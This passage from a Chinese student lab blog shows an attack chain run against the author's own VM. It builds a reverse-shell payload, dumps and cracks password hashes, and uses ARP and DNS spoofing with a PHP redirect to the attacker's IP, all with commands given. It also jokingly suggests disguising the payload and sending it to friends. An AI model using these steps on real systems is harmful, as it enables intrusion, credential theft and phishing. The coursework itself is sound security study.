    隨後win7靶機自動重啓,而後彈窗提示剛剛異常關機了(廢話不異常纔怪呢嘿嘿嘿):

返回目錄

0x07 Armitage下網絡欺詐綜合應用

7.1 Social Engineering Toolkit:Armitage下利用SET工具構造payload獲取Windows開機密碼

咱們還能夠將Exp7中用到的setoolkit和Armitage配合使用進行社會工程學攻擊,實現靶機自動上線並獲取靶機Administer帳戶登陸密碼!

  • 打開Kali攻擊機,終端中輸入setoolkit命令啓動SET工具,而後輸入y,出現歡迎頁面,選擇1進行社會工程學攻擊:
  • 選擇4生成一個payload和監聽:
  • 選擇2Windows Reverse_TCP Meterpreter:
  • 配置LHOST(Kali攻擊機IP)和LPORT(本身學號),而後輸入yes
  • 打開自動生成的payload.exe目錄並找到該文件:
  • 將生成的payload.exe利用ncat傳到靶機並運行:
    • win7靶機用命令行進入ncat目錄,打開監聽:
      ncat.exe -lv 5314 > payload.exe
    • Kali攻擊機創建鏈接並傳輸:
      ncat -nv 10.211.55.14 5314 < payload.exe
  • 此時在setoolkit中發現已經有一個session被打開:
  • 使用sessions命令查看當前可鏈接的會話,並用sessions -i進行鏈接:
  • 接下來就...嘿嘿嘿你懂的>_<

    咱們的口號是:搞事情!搞事情!搞事情!

下面終於輪到咱們的Armitage大幹一番了!!!

  • 打開Armitage,在頂端工具欄中依次選擇Armitage->Listeners->Set LHOST,填寫Kali攻擊機IP地址:

  • 選擇Reverse(wait for)設置端口和類型:
  • 填寫端口(學號)和Meterpreter類型:
  • 配置好後點擊Start Listener開始監聽,此時msf會自動配置exploit模塊:
  • 此時靶機重啓並運行咱們的payload.exe時,目標會自動出如今Armitage控制檯界面內並被開啓Meterpreter會話:

    這就輕易地實現靶機自動上線了!還在等什麼趕快把這個exe文件改個名換個圖標假裝一下發給你的小夥伴們吧(壞笑)~

  • 接下來咱們將經過抓取管理員Hash值的方法破解靶機的開機密碼!首先在攻擊成功的靶機上右鍵依次選擇Meterpreter 1->Access->Dump Hashes->registry method

  • 能夠看出Dump Hashes的原理是從SAM文件中dump域帳戶的密碼hash,話很少說直接用默認配置Launch

  • dump hashes居然失敗了,提示權限不夠:
  • 既然如此咱們手動提權試一下?
    • 首先用sessions命令查看會話,而後用sessions -i 1命令進入會話1
    • 先用getuid命令查看當前帳戶名爲crazymosquito,再用getsystem命令提權:

      什麼?居然也不行!
  • 實際上這是因爲win7靶機當前登陸的用戶帳戶不是Administrator致使的>_<咱們須要從新啓用Administrator帳戶!
    • 在靶機桌面上右擊計算機圖標,選擇【管理】打開計算機管理:
    • 在左側目錄依次選擇計算機管理(本地)->本地用戶和組->用戶,在Administrator上右擊【屬性】,把帳戶已禁用前面的勾去掉便可:
    • 刪除當前用戶crazymosquito:
    • 而後一路選是(Y)


    • 能夠看出當前帳戶已變成Administrator
  • 爲了體現出當前帳戶的變化咱們應註銷當前用戶並從新登陸Administrator帳戶,而後點開payload.exe從新回連Kali,此時回到Armitage能夠看到直接回連成功(靶機下方描述爲ODCE\Administrator):

  • 查看當前會話並進入會話3,發現已經能夠成功提權(靶機下方描述變爲NT AUTHORITY\SYSTEM):
  • 從新進行hashdump:
  • 此時能夠看到成功抓取到Hash值!

接下來咱們利用Kali自帶的工具Ophcrack對Hash進行破解!

  • Ophcrack工具介紹:

    Ophcrack是一款利用彩虹表來破解Windows密碼的圖形界面化工具。

    • 彩虹表(Rainbow Table)是一種破解Hash算法(找到碰撞)的技術,將暴力破解和字典兩種經常使用的攻擊方法結合起來,用一個大型數據字典來進行快速匹配暴力破解,以空間換時間,破解效率大幅度提升。

    • LM(LanManager)是Windows古老而脆弱的密碼加密方式。任何大於7位的密碼都被分紅以7爲單位的幾個部分,最後不足7位的密碼以0補足7位,而後經過加密運算最終組合成一個hash。因此實際上經過破解軟件分解後,LM密碼破解的上限就是7位,這使得以今天的PC運算速度在短期內暴力破解LM加密的密碼成爲可能(上限是兩週),若是使用彩虹表,那麼這個時間數量級可能被降低到小時。

  • 和Armitage相似,咱們能夠經過菜單欄05-Password文件夾下找到Ophcrack的圖標直接打開她:

  • 首先,咱們須要從官網下載Ophcrack提供的彩虹表文件。Ophcrack官網提供的彩虹表有XP和Vista兩個版本:

    • XP版本提供了四個免費的彩虹表:XP free small (380MB)XP free fast (703MB)XP special (7.5GB)XP german (7.4GB)

      選擇最小的那個查看介紹學習一波:

      XP free small (380MB)

      標識:SSTIC04-10k

      破解成功率: 99.9%

      字母數字表:123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ

      該表有大小寫字母加數字生成,大小爲380MB,包含全部字母數字混合密碼中99.9%的LanManager表。這些都是用大小寫字母和數字組成的密碼(大約800億組合)。

      因爲LanManager哈希表將密碼截成每份7個字符的兩份,咱們就能夠用該表破解長度在1到14之間的密碼。因爲LanManager哈希表也是不區分大小寫的,該表中的800億的組合就至關於(12*10)^11(或者2^83)個密碼,所以也被稱爲「字母數字表10K」。

    • Vista版本的彩虹表有Vista free (461MB)Vista proba free (581MB)Vista special (8.0GB)Vista num (3.0GB)

    • 因爲這裏測試的是win7的密碼並且是簡單密碼,咱們下載Vista版本的Vista proba free(581MB)便可:

      咱們還能夠看出彩虹表大小大體和字符集、可以破解密碼長度有關,設置的字符集越複雜、能破解的長度越長彩虹表的體積就越龐大(咱們密碼技術競賽用到的彩虹表超過500G)!

  • 下載完以後,咱們打開Ophcrack工具,點擊上方工具欄的Tables

  • 點擊右下角的Install

  • 選擇咱們下載的彩虹表文件(解壓以後獲得的文件夾):

  • 此時對應的彩虹表項會變綠表示可用,點擊OK返回:

  • 在上方工具欄依次選擇Load->Single hash

  • 把咱們剛纔dump到的Hash值複製過來,點擊OK進行破解:

  • 秒破解!顯示win7靶機的開機密碼爲空(其實根本就沒設置233)!

  • 沒意思?那咱們來給Administrator設個密碼試試!
    又回到熟悉的操做啦>_<

    從新登陸一下(密碼就不告訴你),而後用payload.exe回連:

  • Armitage這邊回連成功後使用hashdump:

  • 將最後這一串複製到Ophcrack中,點擊工具欄中的Crack開始破解:

  • 能夠看到已經開始加載彩虹表進行破解,下方記錄了進度和所用時間:

  • 最後Ophcrack只用2分19秒就把win7靶機這個字母數字混合的密碼給破解出來了!能夠看出彩虹表的性能仍是很是驚人的>_<

返回目錄

7.2 Bettercap+dnsspoof:Armitage下利用中間人攻擊實現網絡釣魚

  • Bettercap工具介紹:

    Bettercap是一個比Exp7中用到的ettercap更先進、好用的也是目前咱們能獲取到的功能最完備的一個中間人攻擊框架。雖然Bettercap沒有GUI界面,可是它仍然很好上手,使用起來特別便利。使用者只須要根據幫助文檔將一個個命令組合起來就可使用其各類強大的功能。

    使用Bettercap時咱們並不須要像使用ettercap同樣先行掃描局域網內的主機,Bettercap會幫咱們自動完成掃描主機的任務,而且能夠實時發現網絡中新接入的設備。若是你想手動指定攻擊目標,Bettercap容許咱們經過命令來關閉自動發現設備的功能而且手動指定要攻擊的單個目標或是部分網段/整個網段。

  • 中間人攻擊原理:

  • DNS欺騙是一種中間人攻擊形式,具體能夠參考個人Exp7博客:2017-2018-2 20155314《網絡對抗技術》Exp7 網絡欺詐防範

  • dnsspoof原理:

    dnsspoof啓用DNS欺騙,若是dnsspoof嗅探到局域網內有DNS請求數據包,它會分析其內容,並用僞造的DNS響應包來回復請求者。若是是請求解析某個域名,dnsspoof會讓該域名從新指向另外一個IP地址(黑客所控制的主機),若是是反向IP指針解析,dnsspoof也會返回一個僞造的域名。

  • Armitage browser_autopwn模塊簡介:

    This module has three actions. The first (and the default) is 'WebServer' which uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. Next is 'DefangedDetection' which does only the fingerprinting part. Lastly, 'list' simply prints the names of all exploit modules that would be used by the WebServer action given the current MATCH and EXCLUDE options. Also adds a 'list' command which is the same as running with ACTION=list.

  • Kali下並無集成Bettercap,咱們須要本身安裝(不大,才4M左右),終端中輸入命令:

    sudo apt-get install bettercap

  • 新建一個名爲test.hosts的hosts文件用於DNS欺騙,輸入命令:

    vim test.hosts

    內容以下,IP爲Kali攻擊機的IP(別忘了後面的*):

  • 開啓Apache服務:

    service apache2 start
  • 進入Apache根目錄/var/www/html,輸入命令:

    cd /var/www/html
  • 新建index.php,並輸入如下代碼而後保存退出:

    <?php 
    header("Location:http://10.211.55.10:8088"); 
    ?>


    這樣在DNS欺騙後會跳到指定IP(Kali攻擊機IP),而後在經過php重定向到咱們的payload。

  • 在Armitage左側樹型目錄下依次選擇auxiliary->server->browser_autopwn並雙擊打開配置,直接用默認設置便可,點擊Launch

    老規矩會進行一系列自動化配置:

    等待全部payload加載完成,一共20個:


  • 咱們打開一個新的終端窗口,輸入命令bettercap開啓bettercap:


    能夠用bettercap -h命令查看幫助文檔:

    與老版本不一樣,新版(v2.0之後)的bettercap須要用-autostart參數來加載相應模塊!

  • 攻擊前,靶機用arp -a命令查看arp緩存表:

  • 開始arp欺騙攻擊,輸入命令:

    bettercap -autostart arp.spoof,net.sniff on


    咱們能夠在靶機中看到她已被成功欺騙>_ <把kali攻擊機當成網關啦> _<

  • Kali這邊開始用dnsspoof進行DNS欺騙,輸入命令:

    dnsspoof -f /root/test.hosts


    如今同一網關下的靶機無論打開什麼URL都會解析到咱們的URL中!

返回目錄

0x08 實踐中遇到的問題及解決過程

啓動Armitage時報錯提示Could not connect to database

解決方案

  • 根據提示在終端中輸入/etc/init.d/postgresql start命令啓動postgresql服務,重啓Armitage便可:

返回目錄

0x09 實踐總結與體會

9.1 Armitage到底能用來幹啥?

   Armitage是圖形化的Metasploit,其操做圍繞着msfconsole展開,經過標籤管理各類程序和各種資訊,能夠同時處理多個msfconsole或session,大大下降了Metasploit操做的複雜度。從安全人員的角度來講,全自動化的Armitage很是有助於管理員對主機的漏洞測試

9.2 一些感覺,寫在最後!

  本次免考實踐時間跨度極大,從最初接觸Armitage有各類想法到挨個落實再到後期不斷打磨直至最終定稿,前先後後竟有兩個月之久!一路走來,正像劉老師說的那樣,「開心就好」,是的我作到了,整個實踐期間我真的很是開心,真的徹底是靠興趣堅持下來的。不少人老是看我趴在電腦前就來問了,都快考完放假了健哥你咋還在作lyd的實驗,我說你不懂,這是我最快樂的時光。漏洞使人沉醉,一個漏洞的復現可讓我錯過飯點、能夠點燈刷夜,但毫不能夠不把她寫進個人博客中!畢竟,爲了這一份小小的成就感,爲了這一點小小的快樂,值^_^
  雖然Hacker隨心所欲,但想要真正成功實施一次入侵仍是很是困難的,受到諸多不可控複雜因素限制,還要考慮清除入侵痕跡。在本身搭的環境中實踐成不成功有時還(shui)得(ping)看(tai)臉(ci),更況且在未知環境中實際應用!還記得第一次漏洞攻擊實驗,從週三開始裝各類虛擬機挨個找漏洞一直弄到週六纔可貴成功第一次攻擊。在作第一個ms08_067漏洞攻擊時,首先是靶機操做系統的選擇上,因爲第一個常用的win7虛擬機已在清明假期被我用騰訊電腦管家打好了補丁極可能沒辦法實施攻擊,所以我先拿PKI實驗課上裝的沒有任何安全防禦的win7客戶機作試驗,發現不行,那就換xp試試唄!而後我便用硬盤裏珍藏多年的xp professional鏡像安裝了一個xp虛擬機,興高采烈地配置好Armitage,一攻擊發現仍是不行!!最後問了不少大佬才知道用英文版的xp能夠成功,但這我仍是攻擊了好幾回的結果……而「永恆之藍」的攻擊更是連xp都不行而只能用PKI的win7虛擬機才能完成……總的來講,漏洞攻擊因「機」而異,尋找漏洞更是徹底取決於Hacker的眼力和本領。網絡攻防其實就是「找漏洞」和「堵漏洞」之間的較量,而所謂「道高一尺魔高一丈」,漏洞攻擊更具備先手優點,未知的敵人永遠在未知的暗處對你發起未知的攻擊。現在,在安全技術已經比較成熟的幾大主流操做系統又在各類知名殺軟的保護加持之下,每每被用戶認爲相對「安全」,但一個新漏洞的發現每每能引發軒然大波,拿到「黑市」中去賣能一晚上暴富;更有甚者如去年不法分子利用NSA武器庫泄漏的危險漏洞「永恆之藍」製做出一款蠕蟲式勒索病毒軟件WannaCry並藉助網絡大範圍傳播,鎖定被感染用戶的系統、加密所有數據並向直接其索取高額比特幣,致使一場全球性互聯網災難!
  給咱們的啓示在於,打補丁的方式雖然能夠防範漏洞攻擊,但這畢竟是被動的,是在攻擊發生以後採起的行爲。首先從源頭上來講,操做系統研發者就不該該讓這些攻擊成爲可能,但無奈地球上畢竟不存在完美的程序猿,寫代碼時不免會產生bug。從安全人員的角度來看,要保護一個系統,必須主動一點,像Hacker那樣並搶在Hacker以前對當前系統可能存在的全部漏洞進行檢測,把漏洞堵起來,不安全的因素找出來,各類安全屏障立起來,讓Hacker無機可乘!

網絡對抗永遠在路上。


  最後仍是要感謝一下一路陪我走來的Mac,他的性能足夠強勁以致於讓我能同時開3個虛擬機作滲透測試(>_<)辛苦啦(>_<)
  最後的最後感謝一下lyd老師(>_<)此處略去n字節(>_<)

本文連接:http://www.javashuo.com/article/p-tsmvoewi-en.html轉載請註明出處,謝謝>_<

返回目錄

0x0a 參考資料

返回目錄

相關文章
相關標籤/搜索